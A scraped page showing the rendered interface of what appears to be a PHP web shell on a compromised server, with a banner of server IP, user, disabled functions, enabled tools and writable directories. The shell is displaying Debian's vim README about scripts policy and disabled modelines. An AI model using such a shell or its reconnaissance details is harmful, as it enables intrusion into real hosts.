Private
Server IP : 195.201.23.43  /  Your IP : 3.128.190.205
Web Server : Apache
System : Linux webserver2.vercom.be 5.4.0-192-generic #212-Ubuntu SMP Fri Jul 5 09:47:39 UTC 2024 x86_64
User : kdecoratie ( 1041)
PHP Version : 7.1.33-63+ubuntu20.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/vim-common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/doc/vim-common/README.Debian
Vim for Debian
---------------

1. The current Debian Vim scripts policy can be found in the vim-doc package
   under /usr/share/doc/vim-common and
   <http://pkg-vim.alioth.debian.org/vim-policy.html/>.

2. Before reporting bugs, check if the bug also exists if you run vim
   with "vim -u NONE -U NONE". If not, make sure that the "bug" is not
   a result of a setting in your ~/.vimrc before reporting it.

 -- Stefano Zacchiroli <zack@debian.org>   Mon, 10 Apr 2006 09:59:41 -0400

MzScheme Vim variant
--------------------

As requested by the current MzScheme maintainer (Ari Pollak <ari@debian.org>),
a vim-mzscheme variant is not being built.  The reasons stated are as follows:

  1) MzScheme does not build on many of Debian's supported architectures.

  2) The MzScheme package is not versioned based on the library.

  3) The MzScheme ABI changes with every upstream version.

 -- James Vega <jamessan@debian.org> Mon, 10  Apr  2006  09:48:25  -0400

Modeline support disabled by default
------------------------------------

Modelines have historically been a source of security/resource vulnerabilities
and are therefore disabled by default in $VIMRUNTIME/debian.vim.

You can enable them in ~/.vimrc or /etc/vim/vimrc with "set modeline".

In order to mimic Vim's default setting (modelines disabled when root, enabled
otherwise), you may instead want to use the following snippet:

  if $USER != 'root'
    set modeline
  else
    set nomodeline
  endif

The securemodelines script from vim.org (and in the vim-scripts package) may
also be of interest as it provides a way to whitelist exactly which options
may be set from a modeline.

 -- James Vega <jamessan@debian.org>  Sun, 04 May 2008 03:11:51 -0400
Private